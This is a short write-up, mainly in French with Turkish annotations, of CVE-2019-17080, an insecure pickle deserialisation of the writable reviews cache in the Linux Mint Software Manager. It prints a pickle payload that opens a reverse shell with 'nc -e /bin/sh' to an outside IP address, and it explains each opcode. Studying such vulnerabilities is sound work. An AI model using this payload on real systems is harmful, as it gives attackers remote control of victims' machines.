
CVE-2019-17080
Le gestionnaire de logiciels Linux Mint (v 7.9.5/9) nous amène à exécuter une injection d'objets et du code arbitraire en raison d'une configuration incorrecte.
mintinsall
S'il y a un nouveau commentaire new-reviews.list télécharger depuis et écrire dans le fichier.

code mintinstall.py
Lorsque le gestionnaire de logiciels démarre pour la première fois, il appelle la classe ReviewCache() du module reviews.

code reviews.py
Lorsque la classe ReviewCache démarre (init), elle appelle _load_cache().

La fonction Load cache lit le fichier dans la variable REVIEWS_CACHE et désérialise les données du fichier à l'aide du module pickle, puis conserve certaines valeurs en mémoire.

Quand je vérifie le fichier, il semble que j'ai le droit d'écrire.

Pickle puisque nous pouvons effectuer des opérations de sérialisation/désérialisation avec le module, nous pouvons inclure le module et exécuter du code arbitraire en utilisant la méthode reduce.

Si vous tentez de désérialiser le fichier, notre code malveillant s'exécutera.
cos
system
(S'nc -e /bin/sh 192.168.2.138 4545'
tR.
>>modül adı c{os}
>> fonksiyon
( >> işaretleyici nesnesi
S >> tırnak sonuna kadar okuyup stack'e at
tR. >> stackte olanları çagır ve sonucu stacke yerleştir.

